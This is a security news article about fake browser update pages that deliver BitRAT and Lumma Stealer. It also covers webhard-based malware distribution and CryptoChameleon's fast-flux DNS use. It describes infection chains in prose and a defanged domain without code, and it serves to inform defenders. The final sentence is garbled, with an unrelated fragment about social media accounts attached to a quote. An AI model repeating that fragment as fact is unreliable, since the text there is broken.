Beware: Fake Browser Updates Deliver BitRAT and Lumma Stealer Malware
Fake web browser updates are being used to deliver remote access trojans (RATs) and information stealer malware such as BitRAT and Lumma Stealer (aka LummaC2).
"Fake browser updates have been responsible for numerous malware infections, including those of the well-known SocGholish malware," cybersecurity firm eSentire said in a new report. "In April 2024, we observed FakeBat being distributed via similar fake update mechanisms."
The attack chain commences when prospective targets visits a booby-trapped website that contains JavaScript code designed to redirect users to a bogus browser update page ("chatgpt-app[.]cloud").
The redirected web page comes embedded with a download link to a ZIP archive file ("Update.zip") that's hosted on Discord and downloaded automatically to the victim's device.
It's worth pointing out that threat actors often use Discord as an attack vector, with a recent analysis from Bitdefender uncovering more than 50,000 dangerous links distributing malware, phishing campaigns, and spam over the past six months.
"Upon execution, the PowerShell code performs multiple functions, including clearing the DNS cache, displaying a message box, downloading further PowerShell code, and installing 'LummaC2' malware," the company said.
According to information shared by the cybersecurity firm, Lumma Stealer emerged as one of the most prevalent information stealers in 2023, alongside RedLine and Raccoon.
"The number of LummaC2-obtained logs listed for sale increased by 110% from Q3 to Q4 2023," it noted. "LummaC2's rising popularity among adversaries is likely due to its high success rate, which refers to its effectiveness in successfully infiltrating systems and exfiltrating sensitive data without detection."
The development comes as the AhnLab Security Intelligence Center (ASEC) disclosed details of a new campaign that employs webhards (short for web hard drive) as a conduit to distribute malicious installers for adult games and cracked versions of Microsoft Office and ultimately deploy a variety of malware such as Orcus RAT, XMRig miner, 3proxy, and XWorm.
Similar attack chains involving websites offering pirated software have led to the deployment of malware loaders like PrivateLoader and TaskLoader, which are both offered as a pay-per-install (PPI) service for other cybercriminals to deliver their own payloads.
It also follows new findings from Silent Push about CryptoChameleon's "almost exclusive use" of DNSPod[.]com nameservers to support its phishing kit architecture. DNSPod, part of the Chinese company Tencent, has a history of providing services for malicious bulletproof hosting operators.
"CryptoChameleon uses DNSPod nameservers to engage in fast flux evasion techniques that allow threat actors to quickly cycle through large amounts of IPs linked to a single domain name," the company said.
"Fast flux allows CryptoChameleon infrastructure to evade traditional countermeasures, and significantly reduces the operational value of legacy point-in-time IOCs." using at least seven primary social media accounts and a CIB network of more than 250 accounts.